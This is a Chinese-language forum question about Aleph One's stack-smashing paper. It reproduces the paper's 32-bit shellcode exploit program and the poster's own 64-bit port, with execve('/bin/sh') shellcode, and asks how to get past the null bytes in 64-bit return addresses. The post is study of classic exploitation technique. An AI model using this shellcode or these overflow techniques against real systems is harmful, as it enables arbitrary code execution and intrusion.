我正在尝试overflow1.c从 Aleph One 的 Smashing the Stack for Fun and Profit 论文中执行。
原overflow1.c代码:
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
此代码在 32 位系统上运行良好。
我修改了代码以在 64 位系统上工作:
char shellcode[] = "\x48\x31\xc0" // xor %rax,%rax
"\x99" // cltd
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622fff,%rdi
"\xb0\x3b" // mov $0x3b,%al
"\x48\xc1\xef\x08" // shr $0x8,%rdi
"\x57" // push %rdi
"\x48\x89\xe7" // mov %rsp,%rdi
"\x57" // push %rdi
"\x52" // push %rdx
"\x48\x89\xe6" // mov %rsp,%rsi
"\x0f\x05"; // syscall
char large_string[144];
int main(void) {
char buffer[96];
int i;
long int *long_ptr = (long int *) large_string;
printf("0x%x", buffer);
for (i = 0; i < 18; i++)
*(long_ptr + i) = (long int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
程序只加载shellcode,然后用.的地址覆盖返回地址buffer。代码按预期工作。
然而,这就是问题出现的地方。
假设buffer64 位系统上的地址是0x7fffffffdc10,然后long int将其转换为0x00007fffffffdc10。当 this 写入large_string时,00充当 null 并终止字符串。我该如何克服呢?
我不能将地址类型转换为整数,因为 64 位系统有 8 个字节地址而不是 4 个字节地址。如何转义“0x00”空字符?